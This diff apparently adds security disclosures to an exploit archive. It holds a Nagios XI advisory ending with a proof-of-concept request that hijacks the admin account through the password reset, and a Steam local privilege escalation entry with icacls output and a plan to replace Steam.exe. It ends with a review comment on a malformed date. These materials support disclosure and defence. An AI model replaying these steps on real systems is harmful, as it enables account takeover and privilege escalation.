+change the login credentials for the specific user for which it was
+generated. A limited user can therefore abuse the password reset
+functionality to hijack an administrative account by tampering with the
+‘username’ hidden parameter during the password reset process.
+
+[POC - ACCOUNT HIJACKING 'nagiosadmin']
+POST /nagiosxi/login.php?finishresetpass&username=stduser&token- HTTP/1.1
+
+token=&username=nagiosadmin&password1=&password2=&reset=1
+
++----------+
+| Solution |
++----------+
+Upgrade to Nagios XI 5.2.8.
+
+Please note at the time of this writing the privilege escalation
+vulnerability is still unpatched. The SSRF vulnerabilities have been
+only partially fixed by blacklisting the 'file://' handler, but all the
+other SSRF attack vectors are still exploitable. Vendor stated these
+vulnerabilities will be likely patched on the next release of the
+application as they require authentication and as such are not
+considered major security issues.
+
++------------+
+| Timeline |
++------------+
+13/05/2016 – Initial disclosure to vendor
+14/05/2016 – Vendor confirms receipt of advisory
+25/05/2016 – Vendor provides fixes for most of the vulnerabilities
+25/05/2016 – Enquiry about the status of fixes for the unpatched
+vulnerabilities
+26/05/2016 – Vendor responded with “Since the major issues have been
+fixed and the remaining issues I'd like to touch up are only available
+if the user is logged in, or logged in as admin, I don't see a reason to
+hold onto releasing the advisory.”
+2/06/2016 – Public disclosure
+
++------------+
+| Additional |
++------------+
+Further information is available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
diff --git a/platforms/windows/local/39888.txt b/platforms/windows/local/39888.txt
new file mode 100755
index 000000000..6891fff56
--- /dev/null
+++ b/platforms/windows/local/39888.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Valve Steam 3.42.16.13 Local Privilege Escalation
+# CVE-ID: CVE-2016-5237
+# Date: 5/11/52016
+# Exploit Author: gsX
+# Contact: gsx0r.sec@gmail.com
+# Vendor Homepage: http://www.valvesoftware.com/
+# Software Link: http://store.steampowered.com/about/
+#Version: File Version 3.42.16.13, Built: Apr 29 2016, Steam API: v017, Steam package versions: 1461972496
+# Tested on: Windows 7 Professional x64 fully updated.
+
+
+1. Description:
+
+The Steam directory located at C:\Program Files (x86)\Steam implement weak
+file permissions
+and allow anyone in the BUILTIN\Users windows group to modify any file in
+the Steam directory and any of its child files and folders.
+
+Since Steam is a startup application by default this makes it particularly
+easy to achieve lateral/vertical privilege escalation and achieve code
+execution against any user running the application.
+
+
+2. Proof
+
+C:\Program Files (x86)>icacls Steam
+Steam BUILTIN\Users:(F)
+ BUILTIN\Users:(OI)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(F)
+ NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+
+3. Exploit:
+
+Simply backdoor/replace Steam.exe or any other related exe's/dll's with
+the code you want to
+run.
+
+I would like to note that I contacted Valve on several occasions
+and gave them plenty of time to reply/fix the issue before releasing this
+entry.
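Review bot: The `# Date:` header reads `5/11/52016`, which is not a valid date; given the `Built: Apr 29 2016` build stamp on the version line it is presumably `5/11/2016`. The `#Version:` header is also missing the space after `#` that every other header line in the file uses. For anyone reproducing the check, the `icacls` listing is the useful part: the non-inherited `BUILTIN\Users:(F)` and `BUILTIN\Users:(OI)(CI)(IO)(F)` entries are what grant the write access, and they stand out against the inherited `(I)(RX)` entries for the same group further down, so the description could point readers at that contrast directly.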